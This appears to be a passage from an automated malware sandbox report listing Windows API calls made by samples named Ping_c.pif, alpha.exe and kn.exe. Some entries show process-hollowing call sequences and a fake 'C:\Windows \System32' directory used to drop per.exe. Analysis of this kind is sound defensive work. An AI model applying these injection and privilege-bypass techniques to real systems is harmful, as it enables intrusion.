        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_02958170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_0295816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_0295C6D4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_0295C6D2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_02957A72 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory
        Source: C:\Users\Public\Libraries\Ping_c.pif; Code function: 31_2_02957CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F1898C NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
        Source: C:\Users\Public\alpha.exe; Code function: 35_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F18114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F17FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F03D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F31538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F1898C NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F189E4 NtQueryInformationToken,NtQueryInformationToken
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F188C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
        Source: C:\Users\Public\alpha.exe; Code function: 38_2_00007FF744F2BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F05240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
        Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF744F14224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
        Source: C:\Users\Public\alpha.exe; File created: C:\Windows 
        Source: C:\Users\Public\alpha.exe; File created: C:\Windows \System32
        Source: C:\Windows\System32\extrac32.exe; File created: C:\Windows \System32\per.exe
        Source: C:\Users\Public\alpha.exe; File deleted: C:\Windows \System32
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F05B705_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F118D45_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0B0D85_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0372C5_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F085105_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F09B505_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F018845_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2AFBC5_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F02C485_2_00007FF744F02C48
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F142248_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0AA548_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F10A6C8_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F155548_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F137D88_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2AA308_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0D2508_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F09E508_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0E6808_2_00007FF744F0E680
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2EE888_2_00007FF744F2EE88
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F07D308_2_00007FF744F07D30
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F27F008_2_00007FF744F27F00
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F315388_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F06EE48_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2D9D08_2_00007FF744F2D9D0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F081D48_2_00007FF744F081D4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F076508_2_00007FF744F07650
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F052408_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F08DF88_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F04A308_2_00007FF744F04A30
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F022208_2_00007FF744F02220
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0CE108_2_00007FF744F0CE10
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F034108_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F06BE08_2_00007FF744F06BE0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2AC4C8_2_00007FF744F2AC4C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F178548_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F03F908_2_00007FF744F03F90
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F05B708_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F118D48_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0B0D88_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0372C8_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F085108_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F09B508_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F018848_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2AFBC8_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F02C488_2_00007FF744F02C48
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803CCB89_2_00007FF60803CCB8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F62F389_2_00007FF607F62F38
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803F0209_2_00007FF60803F020
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803BC109_2_00007FF60803BC10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803C1209_2_00007FF60803C120
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080638009_2_00007FF608063800
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F529409_2_00007FF607F52940
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB69849_2_00007FF607FB6984
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA89909_2_00007FF607FA8990
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A9F09_2_00007FF60802A9F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBE9F09_2_00007FF607FBE9F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB09EC9_2_00007FF607FB09EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDAA009_2_00007FF607FDAA00
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608024A409_2_00007FF608024A40
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803AA589_2_00007FF60803AA58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608044A589_2_00007FF608044A58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD6A849_2_00007FF607FD6A84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDEA7C9_2_00007FF607FDEA7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA4B309_2_00007FF607FA4B30
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F74B689_2_00007FF607F74B68
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608006B949_2_00007FF608006B94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC8BD49_2_00007FF607FC8BD4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9CBFC9_2_00007FF607F9CBFC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5AC089_2_00007FF607F5AC08
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA0C289_2_00007FF607FA0C28
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028C589_2_00007FF608028C58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805CC8C9_2_00007FF60805CC8C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCCC809_2_00007FF607FCCC80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FECCA89_2_00007FF607FECCA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608048CF49_2_00007FF608048CF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F68D009_2_00007FF607F68D00
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2CF89_2_00007FF607FE2CF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FACD109_2_00007FF607FACD10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB2D189_2_00007FF607FB2D18
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA8D2C9_2_00007FF607FA8D2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608032D6C9_2_00007FF608032D6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC6D7C9_2_00007FF607FC6D7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7EDA49_2_00007FF607F7EDA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608034E589_2_00007FF608034E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608038EAC9_2_00007FF608038EAC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8EED49_2_00007FF607F8EED4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F56EF49_2_00007FF607F56EF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F78F1C9_2_00007FF607F78F1C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF4F949_2_00007FF607FF4F94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F84F909_2_00007FF607F84F90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F510309_2_00007FF607F51030
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9107C9_2_00007FF607F9107C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAD0949_2_00007FF607FAD094
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6B09C9_2_00007FF607F6B09C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801511C9_2_00007FF60801511C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F701409_2_00007FF607F70140
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F581709_2_00007FF607F58170
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAC1D09_2_00007FF607FAC1D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDA1E89_2_00007FF607FDA1E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080641F89_2_00007FF6080641F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801821C9_2_00007FF60801821C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080342749_2_00007FF608034274
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7227C9_2_00007FF607F7227C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC62809_2_00007FF607FC6280
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAE29C9_2_00007FF607FAE29C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803234C9_2_00007FF60803234C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE63749_2_00007FF607FE6374
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9E3A09_2_00007FF607F9E3A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB03989_2_00007FF607FB0398
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE43D09_2_00007FF607FE43D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD84149_2_00007FF607FD8414
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F744109_2_00007FF607F74410
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803E4309_2_00007FF60803E430
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5A4249_2_00007FF607F5A424
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60806842F9_2_00007FF60806842F
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCA4509_2_00007FF607FCA450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC4509_2_00007FF607FCC450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA84849_2_00007FF607FA8484
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080304909_2_00007FF608030490
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE84889_2_00007FF607FE8488
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F964A89_2_00007FF607F964A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC24D49_2_00007FF607FC24D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F644E09_2_00007FF607F644E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080384D89_2_00007FF6080384D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDE4F09_2_00007FF607FDE4F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5C5209_2_00007FF607F5C520
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080245389_2_00007FF608024538
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB655C9_2_00007FF607FB655C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F885709_2_00007FF607F88570
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA25809_2_00007FF607FA2580
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE57C9_2_00007FF607FEE57C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080485A89_2_00007FF6080485A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080585EC9_2_00007FF6080585EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F605E09_2_00007FF607F605E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801C6309_2_00007FF60801C630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB86309_2_00007FF607FB8630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBC6D09_2_00007FF607FBC6D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC6F89_2_00007FF607FCC6F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080467509_2_00007FF608046750
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080007D09_2_00007FF6080007D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD27D09_2_00007FF607FD27D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDC7F09_2_00007FF607FDC7F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDE8449_2_00007FF607FDE844
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080428549_2_00007FF608042854
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080308C89_2_00007FF6080308C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080348C49_2_00007FF6080348C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60804994C9_2_00007FF60804994C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080479389_2_00007FF608047938
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF9909_2_00007FF607FDF990
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD19AC9_2_00007FF607FD19AC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7F9B89_2_00007FF607F7F9B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F51A109_2_00007FF607F51A10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F83A409_2_00007FF607F83A40
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCBA489_2_00007FF607FCBA48
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA1A609_2_00007FF607FA1A60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608009A589_2_00007FF608009A58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F67AB49_2_00007FF607F67AB4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB7AC89_2_00007FF607FB7AC8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801BB289_2_00007FF60801BB28
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFFB509_2_00007FF607FFFB50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE7B749_2_00007FF607FE7B74
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC1B849_2_00007FF607FC1B84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5FB849_2_00007FF607F5FB84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F55BA49_2_00007FF607F55BA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F79BC89_2_00007FF607F79BC8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBDBF09_2_00007FF607FBDBF0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608003C109_2_00007FF608003C10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8FC209_2_00007FF607F8FC20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAFC349_2_00007FF607FAFC34
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA3C609_2_00007FF607FA3C60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805FC909_2_00007FF60805FC90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD1C909_2_00007FF607FD1C90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6BCA49_2_00007FF607F6BCA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F89CD09_2_00007FF607F89CD0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608019CC09_2_00007FF608019CC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FABCE89_2_00007FF607FABCE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F65D089_2_00007FF607F65D08
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8DD209_2_00007FF607F8DD20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB1D709_2_00007FF607FB1D70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608007D709_2_00007FF608007D70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA9D6C9_2_00007FF607FA9D6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805DD849_2_00007FF60805DD84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEBDA09_2_00007FF607FEBDA0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F61DE89_2_00007FF607F61DE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F85DF79_2_00007FF607F85DF7
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE1E2C9_2_00007FF607FE1E2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDBE709_2_00007FF607FDBE70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FADEA49_2_00007FF607FADEA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDDEB09_2_00007FF607FDDEB0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA1ED09_2_00007FF607FA1ED0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD9EE49_2_00007FF607FD9EE4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE5F049_2_00007FF607FE5F04
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F51F809_2_00007FF607F51F80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608009FF89_2_00007FF608009FF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB80189_2_00007FF607FB8018
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F880809_2_00007FF607F88080
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080220849_2_00007FF608022084
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBC0B89_2_00007FF607FBC0B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF1689_2_00007FF607FDF168
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6D1B89_2_00007FF607F6D1B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA11C89_2_00007FF607FA11C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA31E09_2_00007FF607FA31E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080052909_2_00007FF608005290
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802D2B49_2_00007FF60802D2B4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAD2C09_2_00007FF607FAD2C0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB92C49_2_00007FF607FB92C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5F2C09_2_00007FF607F5F2C0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC92D89_2_00007FF607FC92D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE53189_2_00007FF607FE5318
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F873409_2_00007FF607F87340
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7B36C9_2_00007FF607F7B36C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803B3AC9_2_00007FF60803B3AC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080433D09_2_00007FF6080433D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080533D49_2_00007FF6080533D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F573F89_2_00007FF607F573F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCD4109_2_00007FF607FCD410
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9F4349_2_00007FF607F9F434
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9D4409_2_00007FF607F9D440
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F554389_2_00007FF607F55438
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFD4609_2_00007FF607FFD460
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB74789_2_00007FF607FB7478
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080094949_2_00007FF608009494
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080494A89_2_00007FF6080494A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F754A09_2_00007FF607F754A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080214F09_2_00007FF6080214F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCF5209_2_00007FF607FCF520
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8156C9_2_00007FF607F8156C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080295809_2_00007FF608029580
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8B58C9_2_00007FF607F8B58C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB55F09_2_00007FF607FB55F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD95FC9_2_00007FF607FD95FC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5F6109_2_00007FF607F5F610
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080336389_2_00007FF608033638
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F956489_2_00007FF607F95648
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7D6609_2_00007FF607F7D660
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080256609_2_00007FF608025660
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080076789_2_00007FF608007678
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080376789_2_00007FF608037678
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA76B09_2_00007FF607FA76B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800D6A09_2_00007FF60800D6A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF6D89_2_00007FF607FDF6D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802D6DC9_2_00007FF60802D6DC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD37609_2_00007FF607FD3760
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA97909_2_00007FF607FA9790
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6B7889_2_00007FF607F6B788
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F917D49_2_00007FF607F917D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC77C89_2_00007FF607FC77C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBD7F09_2_00007FF607FBD7F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6F8009_2_00007FF607F6F800
